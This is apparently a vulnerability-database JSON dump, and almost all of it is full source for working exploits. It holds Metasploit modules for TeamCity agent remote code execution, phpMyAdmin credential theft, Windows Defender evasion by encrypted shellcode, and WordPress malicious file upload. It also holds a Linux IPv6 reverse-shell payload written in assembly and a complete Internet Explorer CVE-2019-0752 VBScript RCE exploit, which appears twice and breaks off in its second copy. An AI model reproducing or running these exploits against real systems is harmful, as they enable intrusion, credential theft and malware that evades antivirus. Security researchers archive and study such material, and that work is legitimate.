<![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootCurrentRevisions class=\"tree-map\"/>\n <myVcsRootEntries/>\n <myVcsRootOldRevisions class=\"tree-map\"/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myId>x</myId>\n <myIsDisabled>false</myIsDisabled>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myChildren class=\"list\"/>\n <myServerParameters class=\"tree-map\">\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myBuildFeatures/>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_7(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.runBuild</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n 
<myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myArtifactPaths/>\n <myBuildTypeOptions/>\n <myFullCheckoutReasons/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>teamcity.step.mode</string>\n <string>default</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>teamcity.build.step.name</string>\n <string>x</string>\n </entry>\n </myServerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n <myDefaultExecutionTimeout>3</myDefaultExecutionTimeout>\n <myBuildFeatures/>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_6_5(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.run</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myPersonal>false</myPersonal>\n 
<myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myAccessCode/>\n <myArtifactDependencies/>\n <myBuildTypeOptions/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myRunnerName>x</myRunnerName>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n </myServerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\n\n def req_teamcity_6(script_content)\n build_id = Rex::Text.rand_text_numeric(8)\n xml_payload = %(\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n <methodName>buildAgent.run</methodName>\n <params>\n <param>\n <value>\n <![CDATA[\n <AgentBuild>\n <myBuildId>#{build_id}</myBuildId>\n <myBuildTypeId>x</myBuildTypeId>\n <myAccessCode></myAccessCode>\n <myPersonal>false</myPersonal>\n <myCheckoutType>ON_AGENT</myCheckoutType>\n <myDefaultCheckoutDirectory>x</myDefaultCheckoutDirectory>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>system.build.number</string>\n <string>0</string>\n </entry>\n </myServerParameters>\n <myVcsRootOldRevisions 
class=\"tree-map\">\n <no-comparator/>\n </myVcsRootOldRevisions>\n <myVcsRootCurrentRevisions class=\"tree-map\">\n <no-comparator/>\n </myVcsRootCurrentRevisions>\n <myArtifactDependencies/>\n <myBuildTypeOptions/>\n <myPersonalVcsChanges/>\n <myUserBuildParameters/>\n <myVcsChanges/>\n <myVcsRootEntries/>\n <myBuildRunners>\n <jetbrains.buildServer.agentServer.BuildRunnerData>\n <myRunType>simpleRunner</myRunType>\n <myServerParameters class=\"tree-map\">\n <no-comparator/>\n </myServerParameters>\n <myRunnerParameters class=\"tree-map\">\n <no-comparator/>\n <entry>\n <string>script.content</string>\n <string>#{script_content}</string>\n </entry>\n <entry>\n <string>use.custom.script</string>\n <string>true</string>\n </entry>\n </myRunnerParameters>\n </jetbrains.buildServer.agentServer.BuildRunnerData>\n </myBuildRunners>\n </AgentBuild>\n ]]>\n </value>\n </param>\n </params>\n</methodCall>\n )\n return xml_payload.strip!\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/misc/teamcity_agent_xmlrpc_exec.rb"}, {"lastseen": "2019-11-19T17:30:26", "bulletinFamily": "exploit", "description": "This module gathers Phpmyadmin creds from target linux machine.\n", "modified": "2018-09-07T16:13:09", "published": "2018-08-19T18:10:19", "id": "MSF:POST/LINUX/GATHER/PHPMYADMIN_CREDSTEAL", "href": "", "type": "metasploit", "title": "Phpmyadmin credentials stealer", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::System\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Phpmyadmin credentials stealer\",\n 'Description' => %q{\n This module gathers Phpmyadmin creds from target linux machine.\n },\n 'License' => 
MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => [\n 'Chaitanya Haritash [bofheaded]',\n 'Dhiraj Mishra <dhiraj@notsosecure.com>'\n ]\n ))\n end\n\n def parse_creds(contents)\n db_user = contents.scan(/\\$dbuser\\s*=\\s*['\"](.*)['\"];/).flatten.first\n db_pass = contents.scan(/\\$dbpass\\s*=\\s*['\"](.*)['\"];/).flatten.first\n\n unless db_user && db_pass\n print_error(\"Couldn't find PhpMyAdmin credentials\")\n return\n end\n\n print_good(\"User: #{db_user}\")\n print_good(\"Password: #{db_pass}\")\n\n print_status(\"Storing credentials...\")\n store_valid_credential(user: db_user, private: db_pass)\n end\n\n def run\n print_line(\"\\nPhpMyAdmin Creds Stealer!\\n\")\n\n if session.platform.include?(\"windows\")\n print_error(\"This module is not compatible with windows\")\n return\n end\n\n conf_path = \"/etc/phpmyadmin/config-db.php\"\n unless file_exist?(conf_path)\n print_error(\"#{conf_path} doesn't exist on target\")\n return\n end\n\n print_good('PhpMyAdmin config found!')\n res = read_file(conf_path)\n unless res\n print_error(\"You may not have permissions to read the file.\")\n return\n end\n\n print_good(\"Extracting creds\")\n parse_creds(res)\n\n p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')\n print_good(\"Config file located at #{p}\")\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/phpmyadmin_credsteal.rb"}, {"lastseen": "2019-12-09T18:28:56", "bulletinFamily": "exploit", "description": "This module allows you to generate a Windows EXE that evades against Microsoft Windows Defender. Multiple techniques such as shellcode encryption, source code obfuscation, Metasm, and anti-emulation are used to achieve this. 
For best results, please try to use payloads that use a more secure channel such as HTTPS or RC4 in order to avoid the payload network traffic getting caught by antivirus better.\n", "modified": "2018-10-06T21:04:07", "published": "2018-08-02T16:54:38", "id": "MSF:EVASION/WINDOWS/WINDOWS_DEFENDER_EXE", "href": "", "type": "metasploit", "title": "Microsoft Windows Defender Evasive Executable", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/compiler/windows'\n\nclass MetasploitModule < Msf::Evasion\n\n def initialize(info={})\n super(merge_info(info,\n 'Name' => 'Microsoft Windows Defender Evasive Executable',\n 'Description' => %q{\n This module allows you to generate a Windows EXE that evades against Microsoft\n Windows Defender. Multiple techniques such as shellcode encryption, source code\n obfuscation, Metasm, and anti-emulation are used to achieve this.\n\n For best results, please try to use payloads that use a more secure channel\n such as HTTPS or RC4 in order to avoid the payload network traffic getting\n caught by antivirus better.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Targets' => [ ['Microsoft Windows', {}] ]\n ))\n end\n\n def rc4_key\n @rc4_key ||= Rex::Text.rand_text_alpha(32..64)\n end\n\n def get_payload\n @c_payload ||= lambda {\n opts = { format: 'rc4', key: rc4_key }\n junk = Rex::Text.rand_text(10..1024)\n p = payload.encoded + junk\n\n return {\n size: p.length,\n c_format: Msf::Simple::Buffer.transform(p, 'c', 'buf', opts)\n }\n }.call\n end\n\n def c_template\n @c_template ||= %Q|#include <Windows.h>\n#include <rc4.h>\n\n// The encrypted code allows us to get around static scanning\n#{get_payload[:c_format]}\n\nint main() {\n int lpBufSize = sizeof(int) * #{get_payload[:size]};\n LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, 
MEM_COMMIT, 0x00000040);\n memset(lpBuf, '\\\\0', lpBufSize);\n\n HANDLE proc = OpenProcess(0x1F0FFF, false, 4);\n // Checking NULL allows us to get around Real-time protection\n if (proc == NULL) {\n RC4(\"#{rc4_key}\", buf, (char*) lpBuf, #{get_payload[:size]});\n void (*func)();\n func = (void (*)()) lpBuf;\n (void)(*func)();\n }\n\n return 0;\n}|\n end\n\n def run\n vprint_line c_template\n # The randomized code allows us to generate a unique EXE\n bin = Metasploit::Framework::Compiler::Windows.compile_random_c(c_template)\n print_status(\"Compiled executable size: #{bin.length}\")\n file_create(bin)\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/evasion/windows/windows_defender_exe.rb"}, {"lastseen": "2019-11-01T19:21:29", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider Plugin v1.0 for WordPress post authentication.\n", "modified": "2018-07-27T04:08:20", "published": "2018-07-25T16:29:47", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_RESPONSIVE_THUMBNAIL_SLIDER_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress Responsive Thumbnail Slider Arbitrary File Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"WordPress Responsive Thumbnail Slider Arbitrary File Upload\",\n 'Description' => %q{\n This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Arash Khazaei', # EDB PoC\n 'Shelby Pace' # Metasploit Module\n ],\n 
'References' =>\n [\n [ 'EDB', '37998' ]\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Aug 28 2015\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base path for WordPress\", '/' ]),\n OptString.new('WPUSERNAME', [ true, \"WordPress Username to authenticate with\", 'admin' ]),\n OptString.new('WPPASSWORD', [ true, \"WordPress Password to authenticate with\", '' ])\n ])\n end\n\n def check\n # The version regex found in extract_and_check_version does not work for this plugin's\n # readme.txt, so we build a custom one.\n check_code = check_version || check_plugin_path\n if check_code\n return check_code\n else\n return CheckCode::Safe\n end\n end\n\n def check_version\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.body && res.body =~ /Version:([\\d\\.]+)/\n version = Gem::Version.new($1)\n if version <= Gem::Version.new('1.0')\n vprint_status(\"Plugin version found: #{version}\")\n return CheckCode::Appears\n end\n end\n\n nil\n end\n\n def check_plugin_path\n plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => plugin_uri\n )\n\n if res && res.code == 200\n vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')\n return CheckCode::Detected\n end\n\n nil\n end\n\n def login\n auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])\n return fail_with(Failure::NoAccess, \"Unable to log into WordPress\") unless auth_cookies\n\n store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)\n\n print_good(\"Logged into WordPress with 
#{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}\")\n auth_cookies\n end\n\n def upload_payload(cookies)\n manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'\n file_payload = get_write_exec_payload(:unlink_self => true)\n file_name = \"#{rand_text_alpha(5)}.php\"\n\n # attempt to access plugins page\n plugin_res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, manage_uri),\n 'cookie' => cookies\n )\n\n unless plugin_res && plugin_res.body.include?(\"tmpl-uploader-window\")\n fail_with(Failure::NoAccess, \"Unable to reach Responsive Thumbnail Slider Plugin Page\")\n end\n\n data = Rex::MIME::Message.new\n data.add_part(file_payload, 'image/jpeg', nil, \"form-data; name=\\\"image_name\\\"; filename=\\\"#{file_name}\\\"\")\n data.add_part(file_name.split('.')[0], nil, nil, \"form-data; name=\\\"imagetitle\\\"\")\n data.add_part('Save Changes', nil, nil, \"form-data; name=\\\"btnsave\\\"\")\n post_data = data.to_s\n\n # upload the file\n upload_res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, manage_uri, '&action=addedit'),\n 'cookie' => cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)\n fail_with(Failure::Unknown, \"Unsure of successful upload\") unless (upload_res && page && page.body =~ /New\\s+image\\s+added\\s+successfully/)\n\n retrieve_file(page, cookies)\n end\n\n def retrieve_file(res, cookies)\n fname = res.body.scan(/slider\\/(.*\\.php)/).flatten[0]\n fail_with(Failure::BadConfig, \"Couldn't find file name\") if fname.empty? 
|| fname.nil?\n file_uri = normalize_uri(target_uri.path, \"wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}\")\n\n print_good(\"Successful upload\")\n send_request_cgi(\n 'uri' => file_uri,\n 'method' => 'GET',\n 'cookie' => cookies\n )\n end\n\n def exploit\n unless check == CheckCode::Safe\n auth_cookies = login\n upload_payload(auth_cookies)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb"}, {"lastseen": "2019-11-30T11:35:04", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-07-23T18:38:25", "published": "2018-06-13T19:29:09", "id": "MSF:PAYLOAD/LINUX/X86/SHELL_REVERSE_TCP_IPV6", "href": "", "type": "metasploit", "title": "Linux Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 158\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'Matteo Malvica <matteo[at]malvica.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix\n ))\n end\n\ndef generate_stage\n # tcp port conversion\n port_order = ([1,0]) # byte ordering\n tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user 
input into integer and unpacked into a string array\n tcp_port.pop # removes the first useless / from the array\n tcp_port.shift # removes the last useless / from the array\n tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.\n\n # ipv6 address conversion\n # converts user's input into ipv6 hex representation\n words = IPAddr.new(datastore['LHOST'], Socket::AF_INET6).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}\n payload_data =<<-EOS\n xor ebx,ebx\n mul ebx\n push 0x6\n push 0x1\n push 0xa\n mov ecx,esp\n mov al,0x66\n mov bl,0x1\n int 0x80\n mov esi,eax\n\n connect:\n xor ecx,ecx\n xor ebx,ebx\n push ebx\n push ebx\n push 0x#{words[3]}\n push 0x#{words[2]}\n push 0x#{words[1]}\n push 0x#{words[0]}\n push ebx\n push.i16 0x#{tcp_port}\n push.i16 0xa\n mov ecx, esp\n push.i8 0x1c\n push ecx\n push esi\n xor ebx,ebx\n xor eax,eax\n mov al,0x66\n mov bl,0x3\n mov ecx,esp\n int 0x80\n xor ebx,ebx\n cmp eax,ebx\n jne retry\n xor ecx,ecx\n mul ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor edx,edx\n mul edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx,esp\n push edx\n push ebx\n mov ecx,esp\n mov al,0xb\n int 0x80\n ret\n\n retry:\n xor ebx,ebx\n push ebx\n push.i8 0xa\n mul ebx\n mov ebx,esp\n mov al,0xa2\n int 0x80\n jmp connect\n ret\n\n exit:\n xor eax,eax\n mov al,0x1\n int 0x80\n EOS\n\n Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb"}], "packetstorm": [{"lastseen": "2019-05-29T03:40:03", "bulletinFamily": "exploit", "description": "", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "PACKETSTORM:153078", "href": 
"https://packetstormsecurity.com/files/153078/Microsoft-Internet-Explorer-Windows-10-1809-17763.316-Memory-Corruption.html", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 Memory Corruption", "type": "packetstorm", "sourceData": "`<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 --> \n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) --> \n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 --> \n \n<!-- Tgroupcrew@gmail.com --> \n \n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get --> \n<!-- all the way to RCE using no shellcode. --> \n \n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. --> \n<!-- (h/t: James Forshaw, Google Project Zero) --> \n \n<html> \n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\"> \n<meta http-equiv=\"Expires\" content=\"-1\"> \n<body> \n<div id=\"container1\" style=\"overflow:scroll; width: 10px\"> \n<div id=\"content1\" style=\"width:5000000px\"> \nContent \n</div> \n</div> \n<script language=\"VBScript.Encode\"> \nDim ar1(&h3000000) \nDim ar2(1000) \nDim gremlin \naddressOfGremlin = &h28281000 \nClass MyClass \nPrivate mValue \nPublic Property Let Value(v) \nmValue = v \nEnd Property \nPublic Default Property Get P \nP = mValue ' Where to write \nEnd Property \nEnd Class \nSub TriggerWrite(where, val) \nDim v1 \nSet v1 = document.getElementById(\"container1\") \nv1.scrollLeft = val ' Write this value (Maximum: 0x001767dd) \nDim c \nSet c = new MyClass \nc.Value = where \nSet v1.scrollLeft = c \nEnd Sub \n' Our vulnerability does not immediately give us an unrestricted \n' write (though we could manufacture one). For our purposes, the \n' following is sufficient. It writes an arbitrary DWORD to an \n' arbitrary location, and sets the subsequent 3 bytes to zero. 
\nSub WriteInt32With3ByteZeroTrailer(addr, val) \nTriggerWrite addr , (val) AND &hff \nTriggerWrite addr + 1, (val\\&h100) AND &hff \nTriggerWrite addr + 2, (val\\&h10000) AND &hff \nTriggerWrite addr + 3, (val\\&h1000000) AND &hff \nEnd Sub \nSub WriteAsciiStringWith4ByteZeroTrailer(addr, str) \nFor i = 0 To Len(str) - 1 \nTriggerWrite addr + i, Asc(Mid(str, i + 1, 1)) \nNext \nEnd Sub \nFunction ReadInt32(addr) \nWriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr \nReadInt32 = ar1(gremlin) \nEnd Function \nFunction LeakAddressOfObject(obj) \nSet ar1(gremlin + 1) = obj \nLeakAddressOfObject = ReadInt32(addressOfGremlin + &h18) \nEnd Function \nSub Exploit() \n' Corrupt vt of one array element (the \"gremlin\") \nTriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4 \nFor i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100 \nIf Not IsEmpty(ar1(i)) Then \ngremlin = i \nExit For \nEnd If \nNext \n \nIf IsEmpty(gremlin) Then \nMsgBox \"Could not find gremlin\" \nExit Sub \nEnd If \n \nFor i = 0 To UBound(ar2) \nSet ar2(i) = CreateObject(\"Scripting.Dictionary\") \nNext \n \nSet dict = ar2(UBound(ar2) / 2) \naddressOfDict = LeakAddressOfObject(dict) \nvtableOfDict = ReadInt32(addressOfDict) \nscrrun = vtableOfDict - &h11fc \nkernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90 \nwinExec = kernel32 + &h5d380 \n \ndict.Exists \"dummy\" ' Make a dispatch call, just to populate pld \n' Relocate pld to ensure its address doesn't contain a null byte \npld = ReadInt32(addressOfDict + &h3c) \nfakePld = &h28281020 \nFor i = 0 To 3 - 1 \nWriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i) \nNext \n \nfakeVtable = &h28282828 ' ASCII \"((((\" \nFor i = 0 To 21 \nIf i = 12 Then ' Dictionary.Exists \nfptr = winExec \nElse \nfptr = ReadInt32(vtableOfDict + 4 * i) \nEnd If \nWriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr \nNext \n \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict, \"((((\\..\\PowerShell.ewe -Command 
\"\"<#AAAAAAAAAAAAAAAAAAAAAAAAA\" \nWriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld \nWriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, \"#>$a = \"\"\"\"Start-Process cmd `\"\"\"\"\"\"/t:4f /k whoami /user`\"\"\"\"\"\"\"\"\"\"\"\" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))\"\"\" \n \nOn Error Resume Next \ndict.Exists \"dummy\" ' Wheeee!! \n \n' A little cleanup to help prevent crashes after the exploit \nFor i = 1 To 3 \nWriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict \nWriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2 \nNext \nErase Dict \nErase ar2 \nEnd Sub \nExploit \n</script> \n</body> \n</html> \n`\n", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/153078/msiew10se-corrupt.txt"}], "zdt": [{"lastseen": "2019-05-24T23:55:27", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2019-05-24T00:00:00", "published": "2019-05-24T00:00:00", "id": "1337DAY-ID-32801", "href": "https://0day.today/exploit/description/32801", "title": "Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption Exploit", "type": "zdt", "sourceData": "<!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 -->\r\n<!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) -->\r\n<!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 -->\r\n\r\n<!-- [email\u00a0protected] -->\r\n\r\n<!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get -->\r\n<!-- all the way to RCE using no shellcode. -->\r\n\r\n<!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. 
-->\r\n<!-- (h/t: James Forshaw, Google Project Zero) -->\r\n\r\n<html>\r\n<meta http-equiv=\"x-ua-compatible\" content=\"IE=8\">\r\n<meta http-equiv=\"Expires\" content=\"-1\">\r\n<body>\r\n\t<div id=\"container1\" style=\"overflow:scroll; width: 10px\">\r\n\t\t<div id=\"content1\" style=\"width:5000000px\">\r\n\t\t\tContent\r\n\t\t</div>\r\n\t</div>\r\n<script language=\"VBScript.Encode\">\r\nDim ar1(&h3000000)\r\nDim ar2(1000)\r\nDim gremlin\r\naddressOfGremlin = &h28281000\r\nClass MyClass\r\n\tPrivate mValue\r\n\tPublic Property Let Value(v)\r\n\t\tmValue = v\r\n\tEnd Property\r\n\tPublic Default Property Get P\r\n\t\tP = mValue\t\t\t\t' Where to write\r\n\tEnd Property\r\nEnd Class\r\nSub TriggerWrite(where, val)\r\n\tDim v1\r\n\tSet v1 = document.getElementById(\"container1\")\r\n\tv1.scrollLeft = val\t\t' Write this value (Maximum: 0x001767dd)\r\n\tDim c\r\n\tSet c = new MyClass\r\n\tc.Value = where\r\n\tSet v1.scrollLeft = c\r\nEnd Sub\r\n' Our vulnerability does not immediately give us an unrestricted\r\n' write (though we could manufacture one). For our purposes, the\r\n' following is sufficient. 
